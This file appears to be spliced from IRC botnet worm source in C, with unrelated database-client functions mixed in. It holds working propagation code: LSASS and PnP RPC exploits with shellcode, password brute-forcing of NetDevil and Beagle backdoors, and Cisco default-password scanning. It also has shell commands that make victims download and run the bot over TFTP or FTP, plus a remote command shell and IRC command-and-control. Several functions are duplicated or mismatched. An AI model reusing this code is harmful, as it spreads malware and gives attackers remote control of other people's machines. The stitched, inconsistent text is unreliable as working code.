void TransferLoop(SOCKET tsock, SOCKET csock)
{
int len;
char buf[1024];
fd_set fd;
while (TRUE) {
FD_ZERO(&fd);
FD_SET(csock, &fd);
FD_SET(tsock, &fd);
memset(buf, 0, sizeof(buf));
fselect(0, &fd, NULL, NULL, NULL);
if(fFD_ISSET(csock, &fd)) {
if((len = frecv(csock,buf,sizeof(buf),0))== -1) break;
if(fsend(tsock,buf,len,0)== -1) break;
}
if (fFD_ISSET(tsock,&fd)) {
if((len = frecv(tsock,buf,sizeof(buf),0))== -1) break;
if(fsend(csock,buf,len,0)== -1) break;
}
}
return;
}
BOOL Cisco(EXINFO exinfo)
{
int ret,SocketFD;
char buffer1[64],buffer2[64];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
memset(buffer1, '\0', 64);
memset(buffer2, '\0', 64);
if ((ret = frecv(SocketFD, buffer1, 64, 0)) > 0)
{
ret = frecv(SocketFD, buffer1, 64, 0);
fsend(SocketFD,"cisco\r",6,0);
ret = frecv(SocketFD, buffer2, 64, 0);
if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40)))
{
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
}
}
return FALSE;
}
BOOL lsass(EXINFO exinfo)
{
int len;
SOCKET sockfd;
int dport = 44444;
struct sockaddr_in their_addr;
char recvbuf[1600];
{
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
/* ^ Server's address */
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/* connect to the server */
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
return FALSE;
if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
switch (recvbuf[68]) {
case '1': // win XP
if (!Exploit2( exinfo, sockfd, 0 ))
return FALSE;
break;
case '0': //win 2k
if (!Exploit2( exinfo, sockfd, 2 ))
if (!Exploit2( exinfo, sockfd, 1))
return FALSE;
break;
default:
return FALSE;
}
}
return TRUE;
}
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(bindport);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s &%s\r\n",
GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
int check_os(char *host,unsigned short target_port, int *sp)
{
SOCKET sSock;
if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(host);
ssin.sin_port = fhtons((unsigned short)target_port);
if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
char recv_buff[5000];
memset(recv_buff,0,sizeof(recv_buff));
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(sSock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
fclosesocket(sSock);
*sp=atoi(&recv_buff[37]);
if (recv_buff[8] == 5 && recv_buff[12] == 0)
return ID_WIN2K;
else if (recv_buff[8] == 5 && recv_buff[12] == 1)
return ID_WINXP;
else if (recv_buff[8] == 5 && recv_buff[12] == 2)
return ID_WIN2K3;
else if (recv_buff[8] == 4)
return ID_WINNT;
else
return ID_UNKNOWN;
}
}
}
}
}
fclosesocket(sSock);
}
return 1;
}
BOOL CiscoHTTP(EXINFO exinfo)
{
int ret,SocketFD;
char buffer[4096];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
return FALSE;
memset(buffer, 0, sizeof(buffer));
if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
return FALSE;
fclosesocket(SocketFD);
if(ret < 5)
return FALSE;
if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
return FALSE;
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
bool ConnectShell(EXINFO exinfo) {
int len;
struct sockaddr_in shell_addr;
char recvbuf[1024];
SOCKET sockfd;
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons((unsigned short)exinfo.port);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 )
return false;
if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1)
return false;
char mkdir_buff[400]="";
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\n"
"%s\n",
GetIP(exinfo.sock),filename, filename);
if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1)
return false;
return true;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons(xport);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
GetIP(exinfo.sock),FTP_PORT, filename, filename);
#endif
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
int IRC_ReceiveLoop(SOCKET sock, char *server, char *channel, char *chanpass, char *nick, int clone)
{
char buffer[4096], masters[MAXLOGINS][MAXIDENT], *lines[MAX_LINES], nickbuf[MAXNICKLEN], host[MAXHOSTNAME];
int i, numlines, repeat, in_channel=0;
for (i = 0; i < MAXLOGINS; i++)
masters[i][0] = '\0';
if (serverpass[0] != '\0')
irc_sendv(sock,"PASS %s\r\n",serverpass);
sprintf(buffer, "NICK %s\r\nUSER %s 0 0 :%s\r\n", nick, rndnick(nickbuf,LETTERNICK, FALSE), nick);
if (fsend(sock, buffer, strlen(buffer), 0) == SOCKET_ERROR) {
fclosesocket(sock);
Sleep(5000);
return 0;
}
while(1) {
memset(buffer, 0, sizeof(buffer));
if (frecv(sock, buffer, sizeof(buffer), 0) <= 0)
break;
// FIX ME: Truncation occurs here
numlines = Split(buffer,&lines);
for (i=0;i < numlines ;i++) {
repeat=1;
do {
#ifdef DEBUG_LOGGING
debuglog(lines[i]);
#endif
#ifdef DEBUG_CONSOLE
printf("%s\n",lines[i]);
#endif
if (lines[i] != NULL)
repeat = IRC_ProtocolParse(lines[i], sock, server, channel, chanpass, nick, host, masters, &in_channel, repeat, clone);
repeat--;
if (repeat > 0)
Sleep(FLOOD_DELAY);
} while (repeat > 0);
switch (repeat) {
case -1:
return 0; // Reconnect
case -2:
return 1; // Disconnect
case -3:
return 2; // Quit
default:
break;
}
}
}
return 0;
}
int socket_receiv_update_count(FOURD *cnx,FOURD_RESULT *state)
{
FOURD_LONG8 data=0;
frecv(cnx->socket,(unsigned char*)&data,8, 0);
Printf("Ox%X\n",data);
cnx->updated_row=data;
Printf("\n");
return 0;
}
BOOL NetDevil(EXINFO exinfo)
{
char buffer[IRCLINE];
DWORD mode=0;
SOCKET ssock;
if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
return FALSE;
SOCKADDR_IN sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
sin.sin_port = fhtons(exinfo.port);
fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
fioctlsocket(ssock,FIONBIO,&mode);
for (int i=0; passwords[i]; i++) {
Sleep(50);
memset(buffer,0,sizeof(buffer));
if (NetDevil_Receive(ssock) == -1)
break;
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
if (strcmp(buffer,"passed") == 0) {
sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]);
fsend(ssock, buffer, strlen(buffer), 0);
if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
fclosesocket(ssock);
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
break;
}
if (strcmp(buffer,"pass_pleaz") == 0) {
memset(buffer,0,sizeof(buffer));
sprintf(buffer,"pass_pleaz%s",passwords[i]);
fsend(ssock,buffer ,strlen(buffer), 0);
continue;
}
else break;
}
fclosesocket(ssock);
return FALSE;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(7777);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
DWORD WINAPI IdentThread(LPVOID param)
{
char user[12], buffer[IRCLINE];
int threadnum = (int)param;
BOOL success = FALSE;
SOCKET ssock,csock;
SOCKADDR_IN ssin, csin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)113);
ssin.sin_addr.s_addr=INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
threads[threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if (flisten(ssock, 5) != SOCKET_ERROR) {
int csin_len = sizeof(csin);
while (1) {
if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
break;
sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
addlog(buffer);
if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
Split(buffer,0);
memset(user, 0, sizeof(user));
_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
success = TRUE;
}
}
}
}
}
if (!success) {
sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
addlog(buffer);
}
fclosesocket(ssock);
fclosesocket(csock);
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI DCCChatThread(LPVOID param)
{
DCC dcc = *((DCC *)param);
DCC *dccs = (DCC *)param;
dccs->gotinfo = TRUE;
char buffer[4096];
SOCKET ssock;
if ((ssock = CreateSock(dcc.host,dcc.port)) == INVALID_SOCKET) {
sprintf(buffer,"[DCC]: Failed to open socket.");
if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
addlog(buffer);
clearthread(dcc.threadnum);
ExitThread(1);
}
if (open_cmd(ssock,"") == -1) {
sprintf(buffer,"[DCC]: Failed to open remote command shell.");
if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
addlog(buffer);
fclosesocket(ssock);
clearthread(dcc.threadnum);
ExitThread(1);
}
Sleep(100);
while (1) {
memset(buffer, 0, sizeof(buffer));
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
strcat(buffer,"\n");
if (!send_commands(buffer))
break;
Sleep(100);
if (findthreadid(RCMD_THREAD) == 0)
break;
}
sprintf(buffer,"[DCC]: Failed to send to Remote command shell.");
if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
addlog(buffer);
fclosesocket(ssock);
clearthread(dcc.threadnum);
ExitThread(0);
}
int socket_receiv_update_count(FOURD *cnx,FOURD_RESULT *state)
{
FOURD_LONG8 data=0;
int iResult=0;
int len=0;
iResult = frecv(cnx->socket,(char*)&data,8, 0);
len+=iResult;
Printf("Ox%X\n",data);
cnx->updated_row=data;
Printf("\n");
return 0;
}
BOOL ReadExact(SOCKET r_sock, char *inbuf, int wanted) {
int offset = 0;
while (wanted > 0) {
int bytes = frecv(r_sock, inbuf+offset, wanted, 0);
if ((bytes == 0) || (bytes == SOCKET_ERROR)) return FALSE;
wanted -= bytes;
offset += bytes;
}
return TRUE;
}
static BOOL GetStr(SOCKET Socket, char *buffer, int cnt)
{
char c;
do {
if (frecv(Socket, &c, 1, 0) != 1)
return (FALSE);
*buffer++ = c;
if (--cnt == 0) {
addlogv("[RLOGIND]: Protocol string too long.");
return (FALSE);
}
} while (c != 0);
return (TRUE);
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
// part of the redirect function, handles sending/recieving for the local connection.
DWORD WINAPI RedirectLoop2Thread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->cgotinfo = TRUE;
int threadnum=redirect.cthreadnum, err;
char buff[4096];
while (1) {
memset(buff, 0, sizeof(buff));
if ((err = frecv(threads[threadnum].csock, buff, sizeof(buff), 0)) <= 0) break;
if ((err = fsend(threads[threadnum].sock, buff, err, 0)) == SOCKET_ERROR) break;
}
fclosesocket(threads[threadnum].csock);
clearthread(threadnum);
ExitThread(0);
}
int KUANG_Reciev(SOCKET sock)
{
TIMEVAL time;
time.tv_sec = 30; //timeout after 60 sec.
time.tv_usec = 0;
fd_set fd_struct;
FD_ZERO(&fd_struct);
FD_SET(sock, &fd_struct);
if (fselect(0, &fd_struct, NULL, NULL, &time) <= 0) {
fclosesocket(sock);
return -1;
}
memset(k2_buffer,0,sizeof(k2_buffer));
if (frecv(sock, k2_buffer, sizeof(k2_buffer), 0) < 1)
return -1;
if (k2_msg->command == K2_ERROR)
return -1;
return 0;
}
int NetDevil_Upload(char *IP, SOCKET ssock)
{
SOCKET nsock;
char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH];
int port = 0,bytes_sent = 0;
unsigned int Fsend = 1024, Fsize, move;
DWORD mode = 0;
BOOL ver15 = FALSE;
GetModuleFileName(NULL, botfile, sizeof(botfile));
fsend(ssock, "version", 7, 0);
memset(buffer,0,sizeof(buffer));
frecv(ssock, buffer, sizeof(buffer), 0);
if (strlen(buffer) > 5) {
buffer[strlen(buffer)-2] = '\0';
char *uPort = strrchr(buffer, '\n\r');
if (uPort != NULL)
port = atoi(uPort);
}
char *ver = strtok(buffer,"\n\r");
if (strcmp(buffer,"ver1.5") == 0)
ver15 = TRUE;
sprintf(rFile,"C:\\%s",filename);
port = ((port == 0)?(903):(port));
if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET)
goto end;
HANDLE testfile;
if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE)
goto end;
Fsize = GetFileSize(testfile,NULL);
if (ver15)
sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize);
else
sprintf(buffer,"%s\r1",rFile);
fsend(nsock, buffer, strlen(buffer), 0);
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
while (Fsize) {
memset(buffer,0,sizeof(buffer));
if (Fsend>Fsize)
Fsend=Fsize;
move = 0-Fsize;
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, buffer, Fsend, &mode, NULL);
bytes_sent = fsend(nsock, buffer, Fsend, 0);
if (bytes_sent == SOCKET_ERROR) {
if (fWSAGetLastError() != WSAEWOULDBLOCK)
goto end;
else
bytes_sent = 0;
}
Fsize = Fsize - bytes_sent;
if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
}
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
fclosesocket(nsock);
Sleep(2000);
sprintf(buffer,"pleaz_run%s",rFile);
fsend(ssock, buffer,strlen(buffer), 0);
memset(buffer,0,sizeof(buffer));
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
if (strcmp(buffer,"pleaz_run_done") != 0)
goto end;
Sleep(4000);
fclosesocket(ssock);
return 1;
end:;
fclosesocket(nsock);
fclosesocket(ssock);
return 0;
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
int socket_receiv_data(FOURD *cnx,FOURD_RESULT *state)
{
int iResult=0;
int offset=0;
int len=0;
int end_row=0;
unsigned int nbCol=state->row_type.nbColumn;
unsigned int nbRow=state->row_count_sent;
unsigned int r,c;
FOURD_TYPE *colType=NULL;
FOURD_ELEMENT *pElmt=NULL;
char status_code=0;
int elmt_size=0;
int elmts_offset=0;
Printf("---Debut de socket_receiv_data\n");
colType=calloc(nbCol,sizeof(FOURD_TYPE));
//bufferize Column type
for(c=0;c<state->row_type.nbColumn;c++)
colType[c]=state->row_type.Column[c].type;
Printf("nbCol*nbRow:%d\n",nbCol*nbRow);
/* allocate nbElmt in state->elmt */
state->elmt=calloc(nbCol*nbRow,sizeof(FOURD_ELEMENT));
Printf("Debut de socket_receiv_data\n");
Printf("state->row_count:%d\t\tstate->row_count_sent:%d\n",state->row_count,state->row_count_sent);
Printf("NbRow to read: %d\n",nbRow);
/* read all row */
for(r=0;r<nbRow;r++)
{
/* read status_code and row_id */
if(state->updateability) /* rowId is send only if row updateablisity */
{
int row_id=0;
status_code=0;
iResult = frecv(cnx->socket,&status_code,sizeof(status_code), 0);
//Printf("status_code for row:0x%X\n",status_code);
len+=iResult;
switch(status_code)
{
case '0':
break;
case '1':
/* pElmt->elmt=calloc(vk_sizeof(colType[0]),1); */
iResult = frecv(cnx->socket,(char*)&row_id,sizeof(row_id), 0);
/* Printf("row_id:%d\n",row_id); */
len+=iResult;
break;
case '2':
Printferr("Error during reading data\n");
iResult = frecv(cnx->socket,(char*)&(state->error_code),sizeof(state->error_code), 0);
len+=iResult;
return 1; /* return on error */
break;
default:
Printferr("Status code 0x%X not supported in data at row %d column %d\n",status_code,(elmts_offset-c+1)/nbCol+1,c+1);
break;
}
}
else {
Printf("Not read rowid\n");
}
/* read all columns */
for(c=0;c<nbCol;c++,elmts_offset++)
{
pElmt=&(state->elmt[elmts_offset]);
pElmt->type=colType[c];
//read column status code
status_code=0;
iResult = frecv(cnx->socket,&status_code,1, 0);
Printf("status: %2X\n",status_code);
len+=iResult;
switch(status_code)
{
case '2'://error
Printferr("Error during reading data\n");
iResult = frecv(cnx->socket,(char*)&(state->error_code),sizeof(state->error_code), 0);
len+=iResult;
